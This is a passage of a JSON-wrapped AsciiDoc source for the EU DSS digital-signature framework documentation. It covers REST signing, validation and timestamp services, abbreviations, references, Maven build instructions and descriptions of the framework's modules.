\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-response.adoc[]\n\n==== Sign document\n\nThe method allows generation of the signed document with the received signature value.\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-response.adoc[]\n\n==== Extend document\n\nThe method allows extension of an existing signature to a stronger level.\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-response.adoc[]\n\n==== Timestamp document\n\nThe method allows timestamping of a provided document.\nIt is available for PDF, ASiC-E and ASiC-S container formats.\n\n.Request\ninclude::_restdocs\/timestamp-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/timestamp-one-document\/1\/http-response.adoc[]\n\n==== Get data to be counter signed\n\nThis method returns the data to be signed in order to create a counter signature. The user should provide a document containing the signature to be counter signed, the id of that signature, and other parameters, similarly to the method 'getDataToSign()'.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/1\/http-response.adoc[]\n\n==== Counter Sign Signature\n\nThis method incorporates the created counter signature into the unsigned properties of the master signature with the specified id.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/2\/http-response.adoc[]\n\n=== REST server signature service\n\nThis service also exposes four methods: \n\n[source,java,indent=0]\n.Rest server signing service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestServerSigningSnippet.java[tags=demo]\n----\n\n==== Get keys\n\nThis method allows retrieving all available keys on the server side (PKCS#11, PKCS#12, HSM,...). Each key has an alias, a signing certificate and its chain.
The alias will be used in the following steps.\n\n.Request\ninclude::_restdocs\/get-keys\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-keys\/1\/http-response.adoc[]\n\n==== Get key\n\nThis method allows retrieving the key information for a given alias.\n\n.Request\ninclude::_restdocs\/get-key\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-key\/1\/http-response.adoc[]\n\n==== Sign\n\nThis method allows signing a given digest with a server-side certificate.\n\n.Request\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-response.adoc[]\n\n=== REST validation service\n\nDSS also provides a module for document validation.\n\n==== Validate a document\n\nThis service allows a signature validation (all formats\/types) against a validation policy.\n\n.Request\ninclude::_restdocs\/validate-doc\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-doc\/1\/http-response.adoc[]\n\n==== Retrieve original document(s)\n\nThis service returns the signed data for a given signature.\n\n.Request\ninclude::_restdocs\/get-original-documents\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-original-documents\/1\/http-response.adoc[]\n\n=== REST certificate validation service\n\n==== Validate a certificate\n\nThis service allows a certificate validation (provided in a binary format).\n\n.Request\ninclude::_restdocs\/validate-cert\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-cert\/1\/http-response.adoc[]\n\n=== REST remote timestamp service\n\n==== Get Timestamp Response\n\nThis service allows a remote timestamp creation. The method takes as input the digest to be timestamped and the digest algorithm that has been used for the digest value computation. The output of the method is the generated timestamp's binaries.\n\n.Request\ninclude::_restdocs\/get-timestamp-response\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-timestamp-response\/1\/http-response.adoc[]\n","old_contents":":toc: left\n:icons: font\n:icon-set: far\n= Digital Signature Service\n:description: Documentation of the open source project DSS (Digital Signature Service). This project allows producing\/validating Advanced electronic signatures (AdES).\n:keywords: electronic signature, XAdES, CAdES, PAdES, ASiC, open source, validation\nversion : {dssVersion} - {docdate}\n\n== Introduction\n\n=== Purpose of the document\n\nThis document describes some examples of how to develop in Java using the DSS framework. The aim is to show developers, in a progressive manner, the different uses of the framework. It will familiarize them with the code step by step.\n\n=== Scope of the document\n\nThis document provides examples of code which allow easy handling of digital signatures.
The examples are consistent with the Release {dssVersion} of the DSS framework which can be downloaded via https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/DSS+releases\n\nThree main features can be distinguished within the framework:\n\n * The digital signature;\n * The extension of a digital signature; and\n * The validation of a digital signature.\n \nIn a more detailed manner, the following concepts and features are addressed in this document:\n \n * Formats of the signed documents: XML, JSON, PDF, DOC, TXT, ZIP...;\n * Packaging structures: enveloping, enveloped, detached and internally-detached;\n * Forms of digital signatures: XAdES, CAdES, PAdES, JAdES and ASiC-S\/ASiC-E;\n * Profiles associated with each form of digital signature;\n * Trust management;\n * Revocation data handling (OCSP and CRL sources);\n * Certificate chain building;\n * Signature validation and validation policy;\n * Signature qualification;\n * Validation reports (Simple, Detailed, ETSI Validation report);\n * Management of signature tokens;\n * Validation of the signing certificate;\n * Timestamp creation;\n * Timestamp validation and qualification;\n * REST and SOAP webservices.\n\nThis is not an exhaustive list of all the possibilities offered by the framework and the proposed examples cover only the most useful features. However, to discover every detail of the operational principles of the framework, the JavaDoc is available within the source code.\n\nPlease note that the DSS framework is still under maintenance and new features will be released in the future.\n\n=== Abbreviations and Acronyms\n\n[cols=2]\n.Abbreviations and Acronyms\n|=======================\n|Code\t\t\t|Description\n|AdES\t\t\t|Advanced Electronic Signature\n|API\t\t\t|Application Programming Interface\n|ASiC\t\t\t|Associated Signature Containers\n|BB\t\t\t\t|Building Block (CEF)\n|CA\t\t\t\t|Certificate authority\n|CAdES\t\t\t|CMS Advanced Electronic Signatures\n|CD\t\t\t\t|Commission Decision\n|CEF\t\t\t|Connecting Europe Facility\n|CMS\t\t\t|Cryptographic Message Syntax\n|CRL\t\t\t|Certificate Revocation List\n|CSP\t\t\t|Core Service Platform (CEF)\n|CSP\t\t\t|Cryptographic Service Provider\n|DER\t\t\t|Distinguished Encoding Rules\n|DSA\t\t\t|Digital Signature Algorithm - an algorithm for public-key cryptography\n|DSI\t\t\t|Digital Service Infrastructure (CEF)\n|DSS\t\t\t|Digital Signature Service\n|EC\t\t\t\t|European Commission\n|eID\t\t\t|Electronic Identity Card\n|ESI\t\t\t|Electronic Signatures and Infrastructures\n|ETSI\t\t\t|European Telecommunications Standards Institute\n|EUPL\t\t\t|European Union Public License\n|FSF\t\t\t|Free Software Foundation\n|GS\t\t\t\t|Generic Service (CEF)\n|GUI\t\t\t|Graphical User Interface\n|HSM\t\t\t|Hardware Security Modules\n|HTTP\t\t\t|Hypertext Transfer Protocol\n|I18N\t\t\t|Internationalization\n|JAdES |JSON Advanced Electronic Signatures\n|Java EE\t\t|Java Enterprise Edition\n|JavaDoc\t\t|JavaDoc is developed by Sun Microsystems to create API documentation in HTML format from the comments in the source code.
JavaDoc is an industrial standard for documenting Java classes.\n|JAXB\t\t\t|Java Architecture for XML Binding\n|JCA\t\t\t|Java Cryptographic Architecture\n|JCE\t\t\t|Java Cryptography Extension\n|JDBC\t\t\t|Java DataBase Connectivity\n|JWS\t\t\t|JSON Web Signatures\n|LGPL\t\t\t|Lesser General Public License\n|LOTL\t\t\t|List of Trusted Lists or List of the Lists\n|LSP\t\t\t|Large Scale Pilot\n|MIT\t\t\t|Massachusetts Institute of Technology\n|MOCCA\t\t\t|Austrian Modular Open Citizen Card Architecture; implemented in Java\n|MS \/ EUMS\t\t|Member State\n|MS CAPI\t\t|Microsoft Cryptographic Application Programming Interface\n|OCF\t\t\t|OEBPS Container Format\n|OCSP\t\t\t|Online Certificate Status Protocol\n|ODF\t\t\t|Open Document Format\n|ODT\t\t\t|Open Document Text\n|OEBPS\t\t\t|Open eBook Publication Structure\n|OID\t\t\t|Object Identifier\n|OOXML\t\t\t|Office Open XML\n|OSI\t\t\t|Open Source Initiative\n|OSS\t\t\t|Open Source Software\n|PAdES\t\t\t|PDF Advanced Electronic Signatures\n|PC\/SC\t\t\t|Personal computer\/Smart Card\n|PDF\t\t\t|Portable Document Format\n|PDFBox\t\t\t|Apache PDFBox - A Java PDF Library: http:\/\/pdfbox.apache.org\/\n|PKCS\t\t\t|Public Key Cryptographic Standards\n|PKCS#12\t\t|It defines a file format commonly used to store an X.509 private key with its accompanying public key certificates, protected by a password\n|PKIX\t\t\t|Internet X.509 Public Key Infrastructure\n|RSA\t\t\t|Rivest Shamir Adleman - an algorithm for public-key cryptography\n|SCA\t\t\t|Signature Creation Application\n|SCD\t\t\t|Signature Creation Device\n|SME\t\t\t|Subject Matter Expert\n|SMO\t\t\t|Stakeholder Management Office (CEF)\n|SOAP\t\t\t|Simple Object Access Protocol\n|SSCD\t\t\t|Secure Signature-Creation Device\n|SVA\t\t\t|Signature Validation Application\n|TL\t\t\t\t|Trusted List\n|TLManager\t\t|Application for managing trusted lists.\n|TSA\t\t\t|Time Stamping Authority\n|TSL\t\t\t|Trust-service Status List\n|TSP\t\t\t|Time Stamp Protocol\n|TSP\t\t\t|Trusted Service Provider\n|TST\t\t\t|Time-Stamp Token\n|UCF\t\t\t|Universal Container Format\n|URI\t\t\t|Uniform Resource Identifier\n|WSDL\t\t\t|Web Services Description Language\n|WYSIWYS\t\t|What you see is what you sign\n|XAdES\t\t\t|XML Advanced Electronic Signatures\n|XML\t\t\t|Extensible Markup Language\n|ZIP\t\t\t|File format used for data compression and archiving\n|=======================\n\n=== References\n\n[%header,cols=4]\n.References\n|=======================\n|Ref.\t\t\t|Title\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|Reference\t\t\t\t\t|Version\n|[[R01]]\tR01\t|ESI - XAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 132 part 1-2\t|1.1.1\n|[[R02]]\tR02\t|ESI - CAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 122 part 1-2\t|1.1.1\n|[[R03]]\tR03\t|ESI - PAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI EN 319 142 part 1-2\t|1.1.1\n|[[R04]]\tR04\t|ESI - Associated Signature Containers (ASiC)\t\t\t\t\t\t\t\t\t|ETSI EN 319 162 part 1-2\t|1.1.1\n|[[R05]]\tR05\t|ESI - JAdES digital signatures\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 182 part 1 \t|draft 0.0.6\n|[[R06]]\tR06\t|Document management - Portable document format - Part 1: PDF 1.7\t\t\t\t|ISO 32000-1\t\t\t\t|1\n|[[R07]]\tR07\t|Directive 1999\/93\/EC of the European Parliament and of the Council of 13 December 1999 on a Community framework for electronic signatures.\t|DIRECTIVE 1999\/93\/EC\t|\n|[[R08]]\tR08\t|Internet X.509 Public Key Infrastructure - Time-Stamp Protocol (TSP)\t\t\t|RFC 3161\t\t\t\t\t|\n|[[R09]]\tR09\t|ESI - Procedures for
Creation and Validation of AdES Digital Signatures\t\t|ETSI EN 319 102-1\t\t\t|1.1.1\n|[[R10]]\tR10\t|ESI - Signature validation policy for European qualified electronic signatures\/seals using trusted lists |ETSI TS 119 172-4\t\t\t|draft\n|[[R11]]\tR11\t|ESI - Trusted Lists\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t|ETSI TS 119 612\t\t |2.1.1\n|[[R12]]\tR12\t|eIDAS Regulation No 910\/2014\t\t\t\t\t\t\t\t\t\t\t\t\t|910\/2014\/EU\t\t\t |\n|[[R13]]\tR13\t|ESI - Procedures for Creation and Validation of AdES Digital Signatures\t\t|ETSI TS 119 102-2\t\t |1.2.1\n|[[R14]]\tR14\t|ESI - Procedures for using and interpreting EU Member States national trusted lists\t\t\t\t\t\t|ETSI TS 119 615\t\t |draft\n\n|=======================\n\n=== Useful links\n\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature[CEF Digital]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+FAQ[eSignature FAQ]\n * https:\/\/webgate.ec.europa.eu\/tl-browser\/#\/[TL Browser]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/CEFDIGITAL\/eSignature+validation+tests[eSignature validation tests]\n * https:\/\/ec.europa.eu\/cefdigital\/wiki\/display\/TLSO\/Trusted+List+Manager+non-EU[Trusted List Manager non-EU]\n * https:\/\/github.com\/esig\/dss[Source code (GitHub)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss\/browse[Source code (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/code\/projects\/ESIG\/repos\/dss-demos\/browse[Source code demonstrations (EC Bitbucket)]\n * https:\/\/ec.europa.eu\/cefdigital\/tracker\/projects\/DSS\/issues[Report an issue (EC Jira)]\n * https:\/\/esig-dss.atlassian.net\/projects\/DSS[Old Jira] \n\n== Build instructions\n\nThis section explains the basic steps required to successfully build the DSS components.\n\n=== DSS Core\n\nThis section explains the build and usage requirements for the https:\/\/github.com\/esig\/dss[DSS framework].\n\n==== Requirements\n\nThe latest version of the DSS framework has the following minimal requirements:\n\n * Java 9 or higher (tested up to Java 15) is required for the build. For usage, Java 8 is the minimum requirement;\n * Maven 3.6 and higher;\n * Memory and Disk: see minimal requirements for the used JVM.
In general, the more resources available, the better;\n * Operating system: no specific requirements (tested on Windows and Linux).\n \nNOTE: We strongly recommend using the latest available version of the JDK, in order to have the latest security fixes and cryptographic algorithm updates.\n\nWARNING: Before processing the build steps, please ensure you have successfully installed Maven and a JVM of a required version.\n\n==== Adding as Maven dependency\n\nThe simplest way to include DSS in your Maven project is to add a repository into the pom.xml file in the root directory of your project as follows:\n\n[source,xml]\n----\n<repositories>\n\t...\n\n\t<repository>\n\t <id>cefdigital<\/id>\n\t <name>cefdigital<\/name>\n\t <url>https:\/\/ec.europa.eu\/cefdigital\/artifact\/content\/repositories\/esignaturedss\/<\/url>\n\t<\/repository>\n<\/repositories>\n----\n\nAfter that, specify the list of dependencies required for your project.\n\nRefresh your project in order to download the dependencies; afterwards you will be able to use all modules of the DSS framework.\n\n==== Maven build and profiles\n\nIn order to use a customized bundle of DSS, you may want to build the DSS Core framework modules.\n\nNOTE: If you have implemented a new feature or fixed a bug issue, your pull requests are welcome at our https:\/\/github.com\/esig\/dss[GitHub Repository].\n\nA simple build of the DSS Maven project can be done with the following command:\n\n----\nmvn clean install\n----\n\nNOTE: All listed commands must be executed from the project directory via a Command Line Interface (CLI).\n\nThis installation will run all unit tests present in the modules, so the complete build can take more than one hour.\n\nIn addition to the general build, the framework provides a list of custom profiles, allowing a customized behavior:\n\n * quick - disables unit tests and the javadoc check, in order to process the build as quickly as possible (takes 2-3 minutes).\n * slow-tests - executes all tests, including time-consuming unit tests.\n * owasp - runs validation of the project and its dependencies against the https:\/\/nvd.nist.gov[National Vulnerability Database (NVD)].\n * jdk19-plus - executed automatically for JDK version 9 and higher. Provides support for newer JDK versions in addition to JDK 8.\n * spotless - used to add a licence header into project files.\n\nWARNING: Some modules (e.g. `dss-utils`, `dss-crl-parser`, etc., see below) still have to be built completely when using the `quick` profile.\n \nIn order to run a build with a specific profile, the following command must be executed:\n\n----\nmvn clean install -P *profile_name*\n----\n\n==== Specific modules\n\nSome modules of the DSS framework have a specific behavior and need to be handled accordingly.\n\nDSS contains a bundle of JAXB-based modules, generating Java classes at build time based on XSD schemas. Whenever a change is made in the XSD, the classes of the module are re-generated according to the change. The following modules represent this behavior:\n\n * specs-xmldsig;\n * specs-xades;\n * specs-trusted-list;\n * specs-validation-report;\n * specs-asic-manifest;\n * specs-saml-assertion;\n * dss-policy-jaxb;\n * dss-diagnostic-jaxb;\n * dss-detailed-report-jaxb;\n * dss-simple-report-jaxb;\n * dss-simple-certificate-report-jaxb.\n\nSpecific modules with JWS and JAdES specifications exist.
Refresh your project in order to download the dependencies; you will then be able to use all modules of the DSS framework.

==== Maven build and profiles

In order to use a customized bundle of DSS, you may want to build the DSS Core framework modules.

NOTE: If you have implemented a new feature or fixed a bug, your pull requests are welcome at our https://github.com/esig/dss[GitHub Repository].

A simple build of the DSS Maven project can be done with the following command:

----
mvn clean install
----

NOTE: All listed commands must be executed from the project directory via a Command Line Interface (CLI).

This installation runs all unit tests present in the modules, so a complete build can take more than one hour.

In addition to the general build, the framework provides a list of custom profiles, allowing a customized behavior:

 * quick - disables unit tests and the javadoc check, in order to process the build as quickly as possible (takes 2-3 minutes).
 * slow-tests - executes all tests, including time-consuming unit tests.
 * owasp - validates the project and the used dependencies against the https://nvd.nist.gov[National Vulnerability Database (NVD)].
 * jdk19-plus - executed automatically for JDK version 9 and higher; provides support for building the JDK 8 code base with newer JDK versions.
 * spotless - used to add a licence header into project files.

WARNING: Some modules (e.g. `dss-utils`, `dss-crl-parser`, etc., see below) still have to be built completely when using the `quick` profile.

In order to run a build with a specific profile, the following command must be executed:

----
mvn clean install -P *profile_name*
----

==== Specific modules

Some modules of the DSS framework have a specific behavior and need to be handled accordingly.

DSS contains a bundle of JAXB-based modules, generating Java classes from XSD schemas. When any change is made in an XSD, the classes of the corresponding module are re-generated accordingly. The following modules show this behavior:

 * specs-xmldsig;
 * specs-xades;
 * specs-trusted-list;
 * specs-validation-report;
 * specs-asic-manifest;
 * specs-saml-assertion;
 * dss-policy-jaxb;
 * dss-diagnostic-jaxb;
 * dss-detailed-report-jaxb;
 * dss-simple-report-jaxb;
 * dss-simple-certificate-report-jaxb.

Specific modules with the JWS and JAdES specifications exist. These modules allow validating the generated JSON against the related JSON Schema:

 * specs-jws;
 * specs-jades.

Also, as explained in the previous section, some modules must be built completely before their dependent modules can be built when using the quick profile, namely:

 * dss-utils;
 * dss-crl-parser;
 * dss-test;
 * dss-pades;
 * dss-asic-common.

These modules contain common interfaces used in other DSS modules, as well as unit tests to ensure equal behavior across their implementations.

==== Documentation generation

In order to generate the HTML and PDF documentation for the DSS project, the module `dss-cookbook` of DSS Core must be built with the following command (please ensure that you are located in the `/dss-cookbook` directory):

----
mvn clean install -P asciidoctor
----

==== Javadoc generation

In order to generate the https://ec.europa.eu/cefdigital/DSS/webapp-demo/apidocs/index.html[HTML Javadoc], you will need to completely build the DSS Core.

[[DSSDemo]]
=== DSS Demonstrations

This section explains the build and usage requirements for the https://github.com/esig/dss-demonstrations[DSS Demonstration Applications].

==== Requirements

The minimal requirements to build/run the DSS Demonstrations:

 * Java 8 or higher (tested up to Java 15);
 * Maven 3.6 or higher (if a build is required);
 * Tomcat 8.5+ for Java 8 and Tomcat 9+ for Java 9 and higher (for the Web-application);
 * Memory and Disk: see the minimal requirements for the used JVM. In general, the more resources available, the better;
 * Operating system: no specific requirements (tested on Windows and Linux).

==== Maven build

The project can be built similarly to the DSS Core framework with the command `mvn clean install`.

Please ensure that you build the modules you really need, and ignore build failures for non-required modules.

===== DSS Standalone Application

In order to build the standalone application, the following modules are required:

 * dss-mock-tsa;
 * dss-standalone-app;
 * dss-standalone-package.

If the build is successful, you will find the following containers in the directory `/dss-standalone-app-package/target/`:

 * dss-standalone-app-package-minimal.zip - contains the application code. Requires a JDK and JavaFX installed on the target machine in order to run the application;
 * dss-standalone-app-package-complete.zip - contains the application code, as well as the JDK and JavaFX library code. Can be run on a machine without pre-installed libraries.

In order to launch the application, you will need to extract the archive and run the file `dss-run.bat`.

===== DSS Web Application

To build the DSS Web Application, the following modules are required:

 * dss-mock-tsa;
 * dss-demo-webapp;
 * dss-demo-bundle.

After a successful build, you will find two containers in the directory `/dss-demo-bundle/target/`: `dss-demo-bundle.zip` and `dss-demo-bundle.tar.gz`. Despite the different container types, the content of both files is the same. After extracting the content, you will need to run the file `Webapp-Startup.bat` in order to launch the server, and the file `Webapp-Shutdown.bat` to stop the server.
After running the server, the web-application will be available at the address `http://localhost:8080/`.

If you experience problems with some particular Trusted Lists during the TL/LOTL loading, please refer to the chapter <<KeyStore>> for a resolution.

The documentation and javadoc will be copied automatically from the built DSS Core and will be available at the following addresses, respectively:

 * HTML documentation : `http://localhost:8080/doc/dss-documentation.html`;
 * PDF documentation : `http://localhost:8080/doc/dss-documentation.pdf`;
 * Javadoc : `http://localhost:8080/apidocs/index.html`.

In order to build a bundle for JDK 15, the following profile can be used from the `dss-demo-bundle` module:

----
mvn clean install -P java15
----

This will create a bundle with Tomcat 9.

===== Integration tests

The `dss-demo-webapp` module provides a collection of integration tests in order to test the behavior of the REST/SOAP web-services. In order to run the tests, a web-server with the DSS Web Application shall be launched, and the following profile needs to be executed from the module:

----
mvn clean install -P run-integration-test
----

== General framework structure

The DSS framework is a multi-module project which can be built with Maven.

=== Maven modules

==== Shared modules

dss-enumerations:: Contains a list of all enumerations used in the DSS project.
dss-alerts:: Allows configuration of triggers and handlers for arbitrarily defined events.
dss-jaxb-parsers:: Contains a list of all classes used to transform JAXB objects/strings to Java objects and vice versa.

==== JAXB model modules

specs-xmldsig:: W3C XSD schema for signatures http://www.w3.org/2000/09/xmldsig
specs-xades:: ETSI EN 319 132-1 XSD schema for XAdES.
specs-trusted-list:: ETSI TS 119 612 XSD schema for parsing Trusted Lists.
specs-validation-report:: ETSI TS 119 102-2 XSD schema for the Validation report.
specs-asic-manifest:: ETSI EN 319 162 schema for ASiCManifest.
specs-saml-assertion:: OASIS schema for SAML Assertions.

'''
dss-policy-jaxb:: JAXB model of the validation policy.
dss-diagnostic-jaxb:: JAXB model of the diagnostic data.
dss-detailed-report-jaxb:: JAXB model of the detailed report.
dss-simple-report-jaxb:: JAXB model of the simple report.
dss-simple-certificate-report-jaxb:: JAXB model of the simple report for certificates.

==== JSON validation modules

specs-jws:: JSON Schemas based on the RFC 7515 specifications (not official).
specs-jades:: ETSI TS 119 182-1 v.0.0.6 JSON Schemas for JAdES.

==== Utils modules

dss-utils:: API with utility methods for String, Collection, I/O,...
dss-utils-apache-commons:: Implementation of dss-utils with Apache Commons libraries.
dss-utils-google-guava:: Implementation of dss-utils with Google Guava.

==== i18n

dss-i18n:: A module allowing internationalization of generated reports.

==== Core modules

dss-model:: Data model used in almost every module.
dss-crl-parser:: API to validate CRLs and retrieve revocation data.
dss-crl-parser-stream:: Implementation of dss-crl-parser which streams the CRL.
dss-crl-parser-x509crl:: Implementation of dss-crl-parser which uses the Java object X509CRL.
dss-spi:: Interfaces and util classes to manipulate ASN.1, compute digests, etc.
dss-document:: Common module to sign and validate documents. This module doesn't contain any implementation.
dss-service:: Implementations to communicate with online resources (TSP, CRL, OCSP).
dss-token:: Token definitions and implementations for MS CAPI, PKCS#11, PKCS#12.
validation-policy:: Business logic of the signature validation (ETSI EN 319 102 / TS 119 172-4).
dss-xades:: Implementation of the XAdES signature, extension and validation.
dss-cades:: Implementation of the CAdES signature, extension and validation.
dss-jades:: Implementation of the JAdES signature, extension and validation.
dss-pades:: Common code which is shared between dss-pades-pdfbox and dss-pades-openpdf.
dss-pades-pdfbox:: Implementation of the PAdES signature, extension and validation with https://pdfbox.apache.org/[PDFBox].
dss-pades-openpdf:: Implementation of the PAdES signature, extension and validation with https://github.com/LibrePDF/OpenPDF[OpenPDF (fork of iText)].
dss-asic-common:: Common code which is shared between dss-asic-xades and dss-asic-cades.
dss-asic-cades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on CAdES signatures.
dss-asic-xades:: Implementation of the ASiC-S and ASiC-E signature, extension and validation based on XAdES signatures.
dss-tsl-validation:: Module which allows loading / parsing / validating of LOTLs and TSLs.

==== WebServices

dss-common-remote-dto:: Common classes between all remote services (REST and SOAP).
dss-common-remote-converter:: Classes which convert the DTOs to DSS objects.

'''
dss-signature-dto:: Data Transfer Objects used for signature creation/extension (REST and SOAP).
dss-signature-remote:: Common classes between dss-signature-rest and dss-signature-soap.
dss-signature-rest-client:: Client for the REST webservices.
dss-signature-rest:: REST webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.
dss-signature-soap-client:: Client for the SOAP webservices.
dss-signature-soap:: SOAP webservices to sign (getDataToSign, signDocument methods), counter-sign and extend a signature.

'''
dss-server-signing-dto:: Data Transfer Objects used for the server signing module (REST and SOAP).
dss-server-signing-common:: Common classes for server signing.
dss-server-signing-rest:: REST webservice for server signing.
dss-server-signing-rest-client:: REST client for server signing (sign method).
dss-server-signing-soap:: SOAP webservice for server signing.
dss-server-signing-soap-client:: SOAP client for server signing (sign method).

'''
dss-validation-dto:: Data Transfer Objects used for signature validation (REST and SOAP).
dss-validation-common:: Common classes between dss-validation-rest and dss-validation-soap.
dss-validation-rest-client:: Client for the REST signature-validation webservices.
dss-validation-soap-client:: Client for the SOAP signature-validation webservices.
dss-validation-rest:: REST webservices to validate a signature.
dss-validation-soap:: SOAP webservices to validate a signature.

'''
dss-certificate-validation-dto:: Data Transfer Objects used for certificate validation (REST and SOAP).
dss-certificate-validation-common:: Common classes between dss-certificate-validation-rest and dss-certificate-validation-soap.
dss-certificate-validation-rest-client:: Client for the REST certificate-validation webservice.
dss-certificate-validation-soap-client:: Client for the SOAP certificate-validation webservice.
dss-certificate-validation-rest:: REST webservice to validate a certificate.
dss-certificate-validation-soap:: SOAP webservice to validate a certificate.

'''
dss-timestamp-dto:: Data Transfer Objects used
for timestamp creation.
dss-timestamp-remote-common:: Common classes between dss-timestamp-remote-rest and dss-timestamp-remote-soap.
dss-timestamp-remote-rest-client:: Client for the REST timestamp webservice.
dss-timestamp-remote-soap-client:: Client for the SOAP timestamp webservice.
dss-timestamp-remote-rest:: REST webservice to create a timestamp.
dss-timestamp-remote-soap:: SOAP webservice to create a timestamp.

==== Other modules

dss-test:: Mocks and util classes for unit tests.
dss-cookbook:: Samples and documentation of DSS used to generate this documentation.

[[dssUtils]]
=== DSS Utils

The module dss-utils offers an interface with utility methods to operate on String, Collection, I/O,... The DSS framework provides two different implementations with the same behaviour :

 * dss-utils-apache-commons : this module uses Apache Commons libraries (commons-lang3, commons-collection4, commons-io and commons-codec).
 * dss-utils-google-guava : this module only requires Google Guava (recommended on Android).

If your integration includes dss-utils, you will need to select an implementation.
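As a quick illustration of the common interface, the following minimal sketch calls a couple of `Utils` methods; it assumes that one of the two implementation modules (e.g. dss-utils-apache-commons) is present on the classpath, otherwise an exception is raised when the `Utils` class is initialized:

[source,java]
.Using the dss-utils API (illustrative sketch)
----
import eu.europa.esig.dss.utils.Utils;

public class UtilsSketch {

	public static void main(String[] args) {
		// both calls delegate to the implementation found on the classpath
		System.out.println(Utils.isStringEmpty(""));           // true
		System.out.println(Utils.toBase64("DSS".getBytes()));  // RFNT
	}
}
----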
[[dssCrlParser]]
=== DSS CRL Parser

DSS contains two ways to parse/validate a CRL and to retrieve revocation data. An alternative to the X509CRL Java object was developed to address memory issues in case of large CRLs. The X509CRL object fully loads the CRL in memory and can cause an OutOfMemoryError.

 * dss-crl-parser-x509crl : this module uses the X509CRL Java object.
 * dss-crl-parser-stream : this module offers an alternative with CRL streaming (experimental).

If your integration requires dss-crl-parser, you will need to choose your implementation.

[[dssPades]]
=== DSS PAdES

Since version 5.4, DSS allows generation/extension/validation of PAdES signatures with two different frameworks : PDFBox and OpenPDF (fork of iText). The dss-pades module only contains the common code and requires an underlying implementation :

 * dss-pades-pdfbox : supports drawing of custom text, images, as well as text+image, in a signature field.
 * dss-pades-openpdf : supports drawing of custom text OR images in a signature field.

DSS permits overriding the visible signature generation with these interfaces :

 * eu.europa.esig.dss.pdf.IPdfObjFactory
 * eu.europa.esig.dss.pdf.visible.SignatureDrawerFactory (selects the SignatureDrawer depending on the SignatureImageParameters content)
 * eu.europa.esig.dss.pdf.visible.SignatureDrawer

A new instance of the IPdfObjFactory can be created with its own SignatureDrawerFactory and injected with padesService.setPdfObjFactory(IPdfObjFactory). By default, DSS uses an instance of ServiceLoaderPdfObjFactory. This instance checks for any registered implementation in the classpath with the ServiceLoader (potentially a service from dss-pades-pdfbox, dss-pades-openpdf or your own(s)).

==== DSS PDFBox

Since version 5.5, DSS allows switching between two implementations of the PDFBox framework : default (original) and native.

 * Default Drawer : the original drawer implemented on the PDFBox framework; supports displaying custom text, images, and text+image combinations in a signature field. The implementation does not include the provided custom text in the inner PDF structure; instead, the drawer creates an image representation of the provided text, which is added to the signature field (i.e. the text is not selectable and not searchable).
 * Native Drawer : since version 5.5, DSS includes a new implementation of the PDFBox Drawer, which allows a user to add real custom text, an image, or a combination of text and image to a visible signature field. The native implementation embeds the provided custom text into the inner PDF structure, which makes the text selectable and searchable, and also clearer and smoother in comparison with the original implementation.

By default, DSS uses the "Default Drawer" as the PDFBox implementation. The implementation can be switched at runtime by setting a new instance of the PdfObjFactory as follows:

[source,java,indent=0]
.Runtime PDF Object Factory changing
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/sign/SignPdfPadesBVisibleTest.java[tags=custom-factory]
----

== Available demonstrations

Some demonstrations are provided with the framework.

[horizontal]
dss-mock-tsa:: Module which generates false timestamps from a self-signed certificate.
sscd-mocca-adapter:: Adapter for the MOCCA connection.
dss-standalone-app:: Standalone application which allows signing a document with different formats and tokens (JavaFX).
dss-standalone-app-package:: Packaging module for dss-standalone-app.
dss-demo-webapp:: Demonstration web application which presents a part of the DSS possibilities.
dss-demo-bundle:: Packaging module for dss-demo-webapp.

WARNING: The demonstrations use a simulated timestamp service (mock), so they are not recommended for production usage.

The requirements and build instructions for the DSS demonstrations can be found in the chapter <<DSSDemo>>.

== Signature's profile simplification

